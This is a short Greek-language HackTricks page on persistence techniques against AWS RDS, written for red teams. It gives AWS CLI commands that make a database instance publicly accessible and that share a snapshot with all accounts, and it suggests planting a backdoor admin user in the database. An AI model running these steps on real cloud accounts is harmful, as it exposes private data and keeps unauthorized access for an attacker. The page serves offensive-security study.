AWS - RDS Persistence

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

RDS

Για περισσότερες πληροφορίες ελέγξτε:

AWS - Relational Database (RDS) Enum

Κάντε την περίπτωση προσβάσιμη δημόσια: rds:ModifyDBInstance

Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να τροποποιήσει μια υπάρχουσα περίπτωση RDS για να ενεργοποιήσει τη δημόσια προσβασιμότητα.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Δημιουργία ενός διαχειριστή χρήστη μέσα στη βάση δεδομένων

Ένας επιτιθέμενος μπορεί απλά να δημιουργήσει έναν χρήστη μέσα στη βάση δεδομένων, έτσι ακόμα κι αν ο κωδικός πρόσβασης του κύριου χρήστη τροποποιηθεί, δεν χάνει την πρόσβαση στη βάση δεδομένων.

Κάντε το snapshot δημόσιο

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated